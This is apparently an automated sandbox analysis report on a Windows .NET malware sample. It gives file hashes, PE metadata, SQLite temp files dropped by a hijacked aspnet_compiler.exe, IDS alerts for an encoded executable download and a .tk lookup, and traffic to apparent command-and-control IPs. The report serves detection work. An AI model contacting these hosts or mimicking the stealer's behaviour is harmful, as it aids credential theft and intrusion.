File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD60.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDBF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE2D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE3B6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE3D6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE406.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE8C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEBC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF80C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.433796373508295
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	StZAEFSb2j.exe
File size:	43520
MD5:	c71616e2b7cedf9fc8e2ca6f6929abdf
SHA1:	896a4c41792c73db51074ccff5ef3f0577f510c5
SHA256:	4a9f8a3b847fa9d2e854d3a7235ddee8e4c093d04c3901f006d430be1060fae5
SHA512:	bcf06478805a8c0b047304989a76a9a6d5380b148524c12eb8e1e2acebead20bc42a969992a332b9ab33e6644ef2e0aaf4d1933f84cbcfccd2d86995310f58ef
SSDEEP:	768:A5588dpB2Gaq7kvl4VPNznshp/xzVmzOMdcGMN75H16U8S4riXzjla:C58K97kuVPRn+/xJm65GMN7FMuBzjo
TLSH:	9113B99D766072DFC85BC0729EA82C68EB60747B931B8243942715ADDE0DA97CF080F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^cc..............0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x40bebe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63635E1E [Thu Nov 3 06:22:22 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbe70	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x5a6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xbe2c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9ec4	0xa000	False	0.41630859375	data	5.4639881643435775	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x5a6	0x600	False	0.4186197916666667	data	4.114149153750449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc0a0	0x31c	data
RT_MANIFEST	0xc3bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.48.8.8.856572532012811 11/03/22-12:44:38.337914	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	56572	53	192.168.2.4	8.8.8.8
50.115.174.192192.168.2.4443496952018856 11/03/22-12:44:39.556293	TCP	2018856	ET TROJAN Windows executable base64 encoded	443	49695	50.115.174.192	192.168.2.4
50.115.174.192192.168.2.4443496962018856 11/03/22-12:44:40.820043	TCP	2018856	ET TROJAN Windows executable base64 encoded	443	49696	50.115.174.192	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:44:38.407645941 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:38.407692909 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:38.407783985 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:38.469727039 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:38.469760895 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:38.837925911 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:38.838049889 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:38.853115082 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:38.853154898 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:38.853569031 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:38.896302938 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.378637075 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.378685951 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.556324959 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.556360006 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.556368113 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.556541920 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.556580067 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.604000092 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.732975006 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.732997894 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.733069897 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.733079910 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.733130932 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.733139992 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.733177900 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.733206987 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.733226061 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.787089109 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.907883883 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.907963991 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.907995939 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.908026934 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.908195972 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.908226967 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.908267975 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.908303022 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.908324957 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.908340931 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.908396006 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:39.908418894 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:39.959028006 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.083826065 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.083920956 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.083951950 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.083975077 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084000111 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084011078 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084038019 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084050894 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084079981 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084084988 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084095001 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084135056 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084188938 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084243059 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084292889 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084342957 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084368944 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084418058 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084441900 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084495068 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084501028 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084513903 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084549904 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084567070 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084568024 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084578991 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084625959 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.084633112 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084681034 CET	443	49695	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.084712029 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.093774080 CET	49695	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.098267078 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.098331928 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.098745108 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.099368095 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.099400997 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.465075970 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.496548891 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.496577024 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.820102930 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.820142984 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.820180893 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.820293903 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.820327997 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.820374012 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.865231991 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.997716904 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.997739077 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.997828007 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.997838974 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.997839928 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.997905970 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.997910976 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.997925043 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.997952938 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.998018026 CET	443	49696	50.115.174.192	192.168.2.4
Nov 3, 2022 12:44:40.998064995 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:40.999274969 CET	49696	443	192.168.2.4	50.115.174.192
Nov 3, 2022 12:44:59.433105946 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:44:59.461632013 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:44:59.461739063 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:44:59.724581957 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:44:59.756546974 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:44:59.757031918 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:44:59.792875051 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:44:59.835566998 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:07.233059883 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:07.261348963 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:07.262254953 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:07.319789886 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:07.319832087 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:07.319849014 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:07.319864035 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:07.320009947 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.535590887 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.536812067 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.563354969 CET	6008	49697	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.563477993 CET	49697	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.564058065 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.564196110 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.572396040 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.602533102 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.606347084 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.633776903 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.633822918 CET	6008	49699	194.55.186.201	192.168.2.4
